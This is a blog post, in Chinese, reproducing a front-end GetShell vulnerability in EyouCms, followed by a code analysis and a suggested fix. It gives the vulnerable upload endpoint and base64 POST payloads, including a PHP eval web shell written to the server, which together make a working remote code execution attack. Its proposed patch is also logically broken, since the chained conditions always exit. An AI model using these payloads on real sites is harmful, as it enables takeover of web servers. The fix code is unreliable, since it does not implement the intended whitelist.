网站首页 个人杂记 正文
广告位 后台主题配置管理 |
文章源自【字节脉搏社区】-字节脉搏实验室
作者-Beginners
0x01 EyouCms前台GetShell漏洞复现
EyouCms是一个自由和开放源码的内容管理系统,它是一个可以独立使用的内容发布系统(CMS)
0x02 漏洞复现:
利用路径:
/index.php/api/Uploadify/preview
POST数据构造:
data:image/php;base64,PD9waHAgcGhwaW5mbygpOw==
直接访问:/preview/文件名.php
测试写入Shell:
data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUW2FdKTs=
0x03 代码分析:
漏洞文件:applicationapicontrollerUploadify.php
漏洞触发函数:preview()
获取POST构造输入的数据,在利用preg_match()获取其中文件后缀和Base64编码数据赋值于$matches;
把获取的Base64编码数据$matches[2]和文件后缀$matches[1]拼接为文件名$filename;
判断文件是否存在,若不存在则$Base64进行base64解码后通过file_put_contents()写入文件中后输出$filename(文件名);到/preview/目录下;
0x04 漏洞修复:
使用白名单判断文件名后缀;
在Uploadify.php中213行到214行的代码修改为如下:
if ($type !== 'jpeg' || $type !=='png' || $type !=='gif' || $type!=='jpg') {
exit();
}
0x05 Cms下载地址:
下载地址:
https://share.weiyun.com/DGjtKLuR
- 上一篇: eyou 易邮去掉版权方法
- 下一篇: 曝光:UCLOUD云大使涉嫌欺骗推广员免费推广!
广告位 后台主题配置管理 |
你 发表评论:
欢迎- 2024-06-08品质之选,信赖钜恒源不锈钢水管
- 2024-05-23这些模型价格下降对开发者和企业主的影响
- 2024-05-14304/316L薄壁不锈钢水管推广计划
- 2024-05-12Edge 中,每次点击会出现一个 黑色边框
- 2024-04-26江湖路 匡文剑
- 2024-04-26三十而立 匡文剑
- 2024-04-26凡人——匡文剑
- 2024-04-26商业认知三点——匡文剑
- 17390℃【起航财富酒店】劳动节亲子活动——起航财富酒店烧烤活动通知
- 16273℃玩自媒体必须知道的20个自媒体平台!
- 14777℃外贸干货!外贸10大网站分析+100个B2B平台,收藏备用
- 14320℃小米/红米手机彻底关闭系统更新提醒方案,免ROOT免ADB!
- 13907℃建站铺申请入驻头条号平台,特此声明; 敬请周知,谢谢!
- 11577℃【信息流推广】转化率爆增90%,一个完整的信息流广告的投放方案.
- 10130℃各大银行app限额设置详细教程
- 9061℃百度搜索重磅推出“鸿雁计划”,为用户体验保驾护航
- 9873℃b2b网站营销要注意的细节问题
本文暂时没有评论,来添加一个吧(●'◡'●)